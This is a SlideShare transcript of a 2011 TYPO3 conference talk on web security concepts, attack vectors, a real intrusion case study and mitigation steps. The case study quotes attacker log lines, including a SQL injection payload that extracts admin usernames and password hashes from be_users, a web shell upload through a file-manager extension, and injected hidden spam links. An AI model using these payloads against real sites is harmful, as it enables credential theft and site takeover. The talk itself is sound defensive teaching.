• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
TYPO3 Security - Risks and Mitigation
 

TYPO3 Security - Risks and Mitigation

on

  • 1,033 views

 

Statistics

Views

Total Views
1,033
Views on SlideShare
1,032
Embed Views
1

Actions

Likes
0
Downloads
2
Comments
0

1 Embed 1

http://www.php-talks.com 1

Accessibility

Categories

Upload Details

Uploaded via as Apple Keynote

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • 1\n2\n3\n4\n5\n6\n7\n
  • \n
  • \n
  • Interrupt me immediatly if you have questions\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\nWhy it is important to define?\n\n\n
  • It depends ;)\n\n
  • Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your „subject“ for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  • Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your „subject“ for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  • Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your „subject“ for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  • \n
  • Caretaking: \n* Replace broken, not working locks, don‘t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  • Caretaking: \n* Replace broken, not working locks, don‘t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  • Caretaking: \n* Replace broken, not working locks, don‘t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  • Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  • Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  • Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with „secret“ name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with „secret“ name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with „secret“ name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with „secret“ name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with „secret“ name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven „small websites“ are targeted\n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven „small websites“ are targeted\n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven „small websites“ are targeted\n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven „small websites“ are targeted\n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven „small websites“ are targeted\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  • TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  • TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  • TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  • RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  • RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  • RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  • \n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • \n

TYPO3 Security - Risks and Mitigation TYPO3 Security - Risks and Mitigation Presentation Transcript

  • TYPO3 Conference - San Francisco 2011 InspiringTYPO Security - Risks and Mitigation sha
  • T3CON11 San Francisco TYPO Security - Risks and Mitigation 10.06.2011Helmut Hummel <helmut.hummel@typo3.org>
  • IntroductionAbout me Involved in TYPO3 project since 2005 Member of the TYPO3 Security Team since 2008 TYPO3 Security Team Leader since 2009 TYPO3 Core Team Member since 2011 Employed at naw.info in Hannover, Germany Twitter: helhum Blog: http://www.naw.info/blogs/typo3security/ Inspiring people toTYPO Security - Risks and Mitigation share
  • TYPO Security - Risks and MitigationAgenda What is Security? General Security Concepts Attack Vectors Knowing the Enemy: A Case Story Mitigation TYPO3 Security Team Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security? Inspiring people toTYPO Security - Risks and Mitigation share
  • Is TYPO3 secure? Is my TYPO3 Site secure? Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Criteria for Security Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Criteria for Security Privacy Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Criteria for Security Privacy Integrity and Property Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Criteria for Security Privacy Integrity and Property Availability and Intentional Use Inspiring people toTYPO Security - Risks and Mitigation share
  • Security is a process, not a product. (Bruce Schneier) Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Security is a process Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Security is a process Care taking and improvements over time Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Security is a process Care taking and improvements over time Depending on your needs Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Security is a process Care taking and improvements over time Depending on your needs Nothing is secure! Something can only be not insecure at a particular time Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Why TYPO3 can be considered to be notinsecure Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Highly customizable for your needs Inspiring people toTYPO Security - Risks and Mitigation share
  • What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Highly customizable for your needs Few critical Security issues over time Inspiring people toTYPO Security - Risks and Mitigation share
  • General Security Concepts Inspiring people toTYPO Security - Risks and Mitigation share
  • General Security ConceptsGeneral Security Concepts Inspiring people toTYPO Security - Risks and Mitigation share
  • General Security ConceptsGeneral Security Concepts Defense in depth Inspiring people toTYPO Security - Risks and Mitigation share
  • General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people toTYPO Security - Risks and Mitigation share
  • General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people toTYPO Security - Risks and Mitigation share
  • General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Inspiring people toTYPO Security - Risks and Mitigation share
  • General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Log Activities Inspiring people toTYPO Security - Risks and Mitigation share
  • Attack Vectors Inspiring people toTYPO Security - Risks and Mitigation share
  • Attack VectorsAttack Vectors Inspiring people toTYPO Security - Risks and Mitigation share
  • Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Inspiring people toTYPO Security - Risks and Mitigation share
  • Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Inspiring people toTYPO Security - Risks and Mitigation share
  • Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Inspiring people toTYPO Security - Risks and Mitigation share
  • Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Inspiring people toTYPO Security - Risks and Mitigation share
  • Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Inspiring people toTYPO Security - Risks and Mitigation share
  • Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Other Software on the webserver Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the Enemy Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyThe incident, how did it happen? <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos- crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for- palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph- infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/ customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http:// yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</ a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt- crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo- v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/ restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http:// tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff- crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser- bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb- password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http:// reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062- crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by- tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2- pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/ primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http:// fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:01:43 +0100]"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 20054383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:02:30 +0100]"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 20054383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemySearching for vulnerabilities14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemySearching for vulnerabilities14:03:21: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemySearching for vulnerabilities14:03:42: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemySearching for vulnerabilities14:04:15: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 -- Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyFound something!14:04:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010order by 10 -- Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyForging the exploit14:08:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyExploit working!14:09:04: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=-2010union select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 --Now the hacker has the md5 hashes ofall admin passwords Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the Enemy15 minutes later: Log in asadmin!14:21:48: /typo3/index.php14:21:50: /typo3/backend.php Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyUploading web shell14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/14:22:46: /typo3conf/ext/realurlmanagement/title.phpYou loose! Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyConclusion Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyConclusion Hackers know what they are doing Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack Inspiring people toTYPO Security - Risks and Mitigation share
  • Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack With automated attacks effort is low, gain is high Inspiring people toTYPO Security - Risks and Mitigation share
  • Mitigation Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationMandatory steps Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationMandatory steps Monitor and Back Up your Website Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Make your Integrators aware of possible TypoScript problems Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationAdvanced steps Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Inspiring people toTYPO Security - Risks and Mitigation share
  • MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Consider using phpids TYPO3 Extension Inspiring people toTYPO Security - Risks and Mitigation share
  • TYPO3 Security Team Inspiring people toTYPO Security - Risks and Mitigation share
  • TYPO3 Security TeamImportant things to know Inspiring people toTYPO Security - Risks and Mitigation share
  • TYPO3 Security TeamImportant things to know Responsible Disclosure Policy Inspiring people toTYPO Security - Risks and Mitigation share
  • TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Inspiring people toTYPO Security - Risks and Mitigation share
  • TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only Inspiring people toTYPO Security - Risks and Mitigation share
  • TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only You can support us Inspiring people toTYPO Security - Risks and Mitigation share
  • TYPO Security - Risks and MitigationRescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://typo3.org/teams/security/security- bulletins/ http://typo3.org/teams/security/resources/ http://buzz.typo3.org/teams/security/ Inspiring people toTYPO Security - Risks and Mitigation share
  • Questions? Inspiring people toTYPO Security - Risks and Mitigation share
  • Thank You! Inspiring people toTYPO Security - Risks and Mitigation share
  • inspiring people to share.